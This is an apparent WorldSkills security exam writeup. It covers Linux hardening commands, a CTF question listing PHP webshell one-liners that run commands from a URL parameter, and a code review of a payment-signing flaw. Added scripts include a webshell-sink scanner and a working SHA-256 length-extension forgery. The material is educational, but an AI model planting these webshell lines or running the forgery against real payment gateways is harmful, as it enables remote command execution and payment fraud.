---
title: World Skills 53 Writeup
tag: World Skill
---

[Exam File Download](https://drive.google.com/uc?export=download&id=1Pt7Hji0B1bFOFqGnXruDtAitN-wOdnbB)

# Security Hardening and Digital Forensics

## (2) Privileged Accounts and Security Hardening

Order of execution: 9 -> 8 -> 7 -> 10. Task 8 has to come before task 7 because `setfacl` rejects a named-user entry for an account that does not exist yet, and task 10 depends on both: `webadmin` must be able to reach `ssh` through `sudo` but not directly.

### 9. Configure iptables so that [lyondows] cannot ping [lyonus] (reject all ping packets)

```bash
sudo iptables -A INPUT -p icmp -j REJECT
```

Appends a rule to the `INPUT` chain of the iptables firewall that rejects incoming ICMP traffic, which is what `ping` (ICMP echo-request) uses.

- `-A INPUT`: Append the rule to the `INPUT` chain (traffic addressed to this host).
- `-p icmp`: Match the ICMP protocol.
- `-j REJECT`: Reject any packet that matches this rule. Unlike `DROP`, `REJECT` sends an ICMP error back, so the pinging side sees `Destination Port Unreachable` instead of a silent timeout.

Two things to keep in mind: rules are evaluated top to bottom and `-A` places this one last, so an earlier `ACCEPT` for ICMP would still win (use `-I INPUT` to put it at the top instead); and the rule only lives in kernel memory, so it is gone after a reboot unless saved with `iptables-save` (the `iptables-persistent` package does this on Debian/Ubuntu). The task asks for every ping packet to be rejected, so matching all of ICMP is fine here; on a production host you would limit the match to `--icmp-type echo-request` from the offending source address so that other ICMP messages (for example path MTU discovery) still get through.

> Use `sudo iptables -S` to list the active iptables rules and check that the rule is present, then run `ping` from [lyondows] to confirm it is rejected.
> **Example output:**
> ```
> -P INPUT DROP
> -P FORWARD DROP
> -P OUTPUT ACCEPT
> -A INPUT -p icmp -j REJECT --reject-with icmp-port-unreachable
> ```

### 8. Configure the webadmin user so that it can run the ssh command through sudo (password required)

```bash
sudo useradd webadmin
```

Creates a new user named `webadmin`.

- `webadmin`: The login name of the new account. Add `-m` if the account also needs a home directory.

The account has no password yet, and `sudo` asks for the invoking user's own password, so set one with `sudo passwd webadmin` before testing.

```bash
sudo usermod -aG sudo webadmin
```

Adds the `webadmin` user to the `sudo` group.

- `-aG`: Append (`-a`) to the supplementary group list (`-G`). Without `-a`, `-G` replaces the user's existing supplementary groups instead of adding to them.

On Debian/Ubuntu the `sudo` group is mapped in `/etc/sudoers` to `%sudo ALL=(ALL:ALL) ALL`, so this grants every command, not only `ssh`, and prompts for a password by default. If the task is read as least privilege, the tighter option is a drop-in file under `/etc/sudoers.d/` that allows `webadmin` only `/usr/bin/ssh`, written with `visudo` so that a syntax error cannot lock you out of `sudo`. Group membership takes effect at the next login.

> Use `groups webadmin` to verify the result. The output should contain `sudo`.
> **Example output:**
> ```
> webadmin: webadmin sudo
> ```

### 7. Use facl to restrict the webadmin user so that it cannot run the ssh command

```bash
which ssh
```

Locates the path of the `ssh` binary (`/usr/bin/ssh` on Debian/Ubuntu).

```bash
sudo setfacl -m u:webadmin:- /usr/bin/ssh
```

Modifies the ACL (Access Control List) of `/usr/bin/ssh`, removing all permissions for `webadmin`.

- `-m`: Modify the ACL (add or replace entries).
- `u:webadmin:-`: A named-user entry for `webadmin` with an empty permission set (`-` is shorthand for `---`), so `webadmin` can neither read nor execute the file even though `other` still has `r-x`.

This does not conflict with task 8: `sudo ssh` executes the binary as root, and the ACL entry only applies to `webadmin`'s own uid, so `ssh` keeps working through `sudo` and fails when run directly. The entry is attached to the file itself, so a package upgrade that replaces `/usr/bin/ssh` would silently drop it.

> Use `getfacl /usr/bin/ssh` to list the ACL of `/usr/bin/ssh`. The output should contain `user:webadmin:---`. As a functional check, `sudo -u webadmin ssh -V` should fail with a permission error, while `sudo ssh -V` still prints the version.
> **Example output:**
> ```
> getfacl: Removing leading '/' from absolute path names
> # file: usr/bin/ssh
> # owner: root
> # group: root
> user::rwx
> user:webadmin:---
> group::r-x
> other::r-x
> ```

[Linux ACL](https://www.redhat.com/sysadmin/linux-access-control-lists)

### 10. As webadmin, run sudo ssh to log in to [lyondows] and, through the lyon account, add the following user on [lyondows]: username `weakman`, password `haha456`

```bash
sudo ssh user@172.16.70.40
```

Logs in to 172.16.70.40 with the username `user`. The `sudo` prefix is required: task 7 removed `webadmin`'s execute permission on `/usr/bin/ssh`, so `ssh` only runs through `sudo` (which asks for `webadmin`'s password, after which `ssh` asks for the remote account's password). The default shell should be CMD; if it is not, enter `cmd.exe` to open it (`net user` works from PowerShell as well).

```bash
net user weakman haha456 /add
```

Creates a new user account named `weakman` with the password `haha456`.

- `weakman`: The username of the account.
- `haha456`: The password of the account.
- `/add`: Add the account to the local user accounts database.

Adding an account needs administrative rights; `System error 5 has occurred. Access is denied.` means the SSH session is not elevated. A password that does not satisfy the machine's password policy is also refused, and the command reports the policy error instead of creating the account.

> Use `net user` to list all user accounts on the computer. The output should contain `weakman`.
> **Example output:**
> ```
> User accounts for \\DESKTOP-FINA67K
> -------------------------------------------------
> Administrator            DefaultAccount           Guest
> sshd                     user                     WDAGUtilityAccount
> weakman
> ```

# CTF

## Part 2: Web

### 5. Refer to the data for this question on the USB, then write the answers to the following two multiple-choice questions under question 5 on the answer sheet.

#### 1. Which PHP function does webshell.php use to invoke system commands?

- A. System
- B. Passthru
- C. Exec
- D. shell_exec

The four candidates (and a few other ways PHP can reach the shell) differ in how they return output, which is what to look for in the file:

```php
<?php
// Execute one command; system() prints the output itself.
system("whoami");

// Take the command from a URL parameter: shell.php?cmd=whoami
system($_GET['cmd']);

// The same with passthru(), which passes the raw output straight to the browser.
passthru($_GET['cmd']);

// shell_exec() returns the output as a string, so echo it to see it.
echo shell_exec("whoami");

// exec() also returns rather than prints, but only the last line of output,
// so on its own it is not very useful.
echo exec("whoami");

// Instead, collect every line of output into an array and print them all.
exec("ls -la", $array);
print_r($array);

// preg_replace() with the /e modifier evaluates the replacement as PHP code.
// A neat trick, but /e was removed in PHP 7.0, so it only works on PHP 5.
preg_replace('/.*/e', 'system("whoami");', '');

// Backticks are shorthand for shell_exec().
$output = `whoami`;
echo "<pre>$output</pre>";

// Backticks again, echoing the result directly.
echo `whoami`;
?>
```

## Part 3: Code Review

### 7. Assuming all of the following code runs correctly, identify the line(s) of code that carry a security weakness and choose the weakness type from the options.

```python
import hashlib
from flask import Flask, redirect
from tools import randid  # tools ships with the exam; randid() is used as the transaction id

secret = "XXXXXXX"
app = Flask(__name__)

def sign(data):
    _data = secret + data
    return hashlib.sha256(_data.encode('utf-8')).hexdigest()

@app.route('/redirect_to_paygateway')
def redirect_to_paygateway():
    tid = randid()
    parameters = "tid={0}&amount={1}".format(tid, 1399)
    return redirect("https://gateway/payment?" + parameters + "&sign=" + sign(parameters), code=302)
```

The weakness is in `sign()`: `sha256(secret + data)` is a plain prefix-keyed hash, not a MAC. SHA-256 is a Merkle-Damgård construction whose output is its internal state, so anyone who holds one valid `sign` value and knows the length of `secret` can resume the hash and produce a valid signature for `parameters` plus padding plus `&amount=1` without ever learning the secret (a length-extension attack). The fix is `hmac.new(secret, data, hashlib.sha256)` on the signing side and `hmac.compare_digest` on the verifying side. Hard-coding `secret` in the source is a second, separate problem.

https://docs.python.org/zh-tw/3/library/pickle.html
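For the webshell question in Part 2 above, the following is an added example and not part of the original writeup or the exam material: a small Python triage script that scans PHP source for the command-execution sinks listed there (plus `popen`/`proc_open`), records the line number, and flags whether request input (`$_GET`, `$_POST`, ...) appears on the same line. The PHP it scans is constructed here for illustration and is not the exam's `webshell.php`.

```python
import re

# Functions that hand a string to the shell: the candidates from the question
# plus popen/proc_open, which real webshells also use.
COMMAND_SINKS = ("system", "passthru", "exec", "shell_exec", "popen", "proc_open")

# PHP function names are case-insensitive, so SYSTEM( counts as well as system(.
# The \b stops "exec" from also firing inside "shell_exec".
CALL_RE = re.compile(r"\b(" + "|".join(COMMAND_SINKS) + r")\s*\(", re.IGNORECASE)

# `cmd` is shorthand for shell_exec().
BACKTICK_RE = re.compile(r"`[^`]+`")

# preg_replace('<delim>pattern<delim><modifiers>', ...): capture the modifiers
# so we can tell whether the /e (eval) modifier is present.
PREG_RE = re.compile(
    r"""preg_replace\s*\(\s*(['"])([^\w\s\\])(.*?)\2([A-Za-z]*)\1""", re.IGNORECASE
)

# Superglobals that carry attacker-controlled request data.
TAINT_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b")


def find_command_sinks(php_source: str) -> list[dict]:
    """One finding per sink occurrence: line number, sink name, and whether
    request input appears on the same line (a crude but useful taint signal)."""
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        tainted = TAINT_RE.search(line) is not None
        for m in CALL_RE.finditer(line):
            findings.append({"line": lineno, "sink": m.group(1).lower(), "tainted": tainted})
        if BACKTICK_RE.search(line):
            findings.append({"line": lineno, "sink": "backtick", "tainted": tainted})
        m = PREG_RE.search(line)
        if m and "e" in m.group(4):
            findings.append({"line": lineno, "sink": "preg_replace /e", "tainted": tainted})
    return findings


def sinks_used(findings: list[dict]) -> set[str]:
    """The distinct sinks seen, i.e. the candidates for the exam question."""
    return {f["sink"] for f in findings}


# Constructed sample (NOT the exam's webshell.php): one of each trick from the list above.
SAMPLE_WEBSHELL = """<?php
// harmless-looking admin page
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
$out = `id`;
echo shell_exec("whoami");
preg_replace('/.*/e', 'system("uname -a");', '');
?>"""

if __name__ == "__main__":
    for hit in find_command_sinks(SAMPLE_WEBSHELL):
        flag = "  <-- request input on this line" if hit["tainted"] else ""
        print(f"line {hit['line']:>3}: {hit['sink']}{flag}")
```

The scan is line-based and pattern-based, so a sink split across lines is missed and a sink name inside a comment or string is reported (the `system` inside the `/e` replacement string is a hit on purpose, since that string is evaluated). It also cannot see obfuscated calls such as `$f = 'sys' . 'tem'; $f($cmd)` or `eval`/`assert`, so treat it as a first pass before reading the file.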
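For the code-review question in Part 3, the following is an added example, not part of the writeup or the exam: it carries out the length-extension attack against `sign()` to show why `sha256(secret + data)` fails as a signature. The script re-implements just enough of SHA-256 (the compression function, with the round constants derived from the primes as FIPS 180-4 specifies) to resume hashing from a known digest, forges a valid signature over `parameters` plus glue padding plus `&amount=1` without the secret, and then shows that the HMAC form of `sign()` does not fall to the same trick. The secret and the parameters are constructed here; the only thing the forgery assumes is the secret's length, which an attacker would simply try a range of.

```python
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotr(x: int, n: int) -> int:
    return ((x >> n) | (x << (32 - n))) & MASK


def _icbrt(n: int) -> int:
    """Floor of the integer cube root by Newton's method (exact on big ints)."""
    x = 1 << ((n.bit_length() + 2) // 3)  # starts above the root and descends
    while True:
        y = (2 * x + n // (x * x)) // 3
        if y >= x:
            return x
        x = y


def _first_primes(count: int) -> list[int]:
    primes, candidate = [], 2
    while len(primes) < count:
        if all(candidate % p for p in primes):
            primes.append(candidate)
        candidate += 1
    return primes


# Round constants as FIPS 180-4 defines them: the first 32 bits of the fractional
# part of the cube root of each of the first 64 primes (derived, not hand-copied).
K = [_icbrt(p << 96) & MASK for p in _first_primes(64)]


def _compress(state: list[int], block: bytes) -> list[int]:
    """SHA-256 compression function: fold one 64-byte block into the 8-word state."""
    w = list(struct.unpack(">16I", block))
    for i in range(16, 64):
        s0 = _rotr(w[i - 15], 7) ^ _rotr(w[i - 15], 18) ^ (w[i - 15] >> 3)
        s1 = _rotr(w[i - 2], 17) ^ _rotr(w[i - 2], 19) ^ (w[i - 2] >> 10)
        w.append((w[i - 16] + s0 + w[i - 7] + s1) & MASK)
    a, b, c, d, e, f, g, h = state
    for i in range(64):
        big_s1 = _rotr(e, 6) ^ _rotr(e, 11) ^ _rotr(e, 25)
        ch = (e & f) ^ (~e & g)
        t1 = (h + big_s1 + ch + K[i] + w[i]) & MASK
        big_s0 = _rotr(a, 2) ^ _rotr(a, 13) ^ _rotr(a, 22)
        maj = (a & b) ^ (a & c) ^ (b & c)
        t2 = (big_s0 + maj) & MASK
        h, g, f, e, d, c, b, a = g, f, e, (d + t1) & MASK, c, b, a, (t1 + t2) & MASK
    return [(s + v) & MASK for s, v in zip(state, (a, b, c, d, e, f, g, h))]


def _md_padding(message_len: int) -> bytes:
    """What SHA-256 appends to a message of this length: 0x80, zeros, 64-bit bit count."""
    return b"\x80" + b"\x00" * ((55 - message_len) % 64) + struct.pack(">Q", message_len * 8)


def sha256_length_extend(known_digest_hex: str, known_len: int, suffix: bytes) -> tuple[bytes, str]:
    """Given sha256(M) and len(M) but not M, return (glue, sha256(M + glue + suffix)).
    The digest is the hash state after M's final block, so resume from it and only
    process the suffix plus the padding for the new total length."""
    glue = _md_padding(known_len)
    state = list(struct.unpack(">8I", bytes.fromhex(known_digest_hex)))
    tail = suffix + _md_padding(known_len + len(glue) + len(suffix))
    for off in range(0, len(tail), 64):
        state = _compress(state, tail[off:off + 64])
    return glue, struct.pack(">8I", *state).hex()


# The page's scheme with a constructed secret. forge() never reads SECRET; it is
# handed only the secret's length, which a real attacker would brute-force.
SECRET = b"XXXXXXX"


def sign(data: bytes) -> str:
    """Vulnerable: sha256(secret || data), as in the exam code."""
    return hashlib.sha256(SECRET + data).hexdigest()


def sign_hmac(data: bytes) -> str:
    """Fixed: HMAC-SHA256 keys the hash properly and cannot be extended."""
    return hmac.new(SECRET, data, hashlib.sha256).hexdigest()


def forge(parameters: bytes, signature: str, secret_len: int,
          suffix: bytes = b"&amount=1") -> tuple[bytes, str]:
    """Extend a signed query string with an attacker-chosen suffix, no secret needed."""
    glue, forged_sig = sha256_length_extend(signature, secret_len + len(parameters), suffix)
    return parameters + glue + suffix, forged_sig


if __name__ == "__main__":
    params = b"tid=a1b2c3&amount=1399"
    forged_params, forged_sig = forge(params, sign(params), len(SECRET))
    print("prefix-hash accepts forgery:", sign(forged_params) == forged_sig)  # True
    _, bad_sig = forge(params, sign_hmac(params), len(SECRET))
    print("HMAC accepts forgery:", sign_hmac(forged_params) == bad_sig)  # False
```

The glue bytes (`0x80`, NULs, the bit count) have to be percent-encoded to travel in a query string, and whether the gateway honours the second `amount=` depends on its parser: Flask's `request.args.get` returns the first value, PHP's `$_GET` the last. None of that changes the verdict on the code under review, which is that a prefix hash lets anyone with one valid URL mint more, while HMAC (and a constant-time comparison on the verifying side) closes that door.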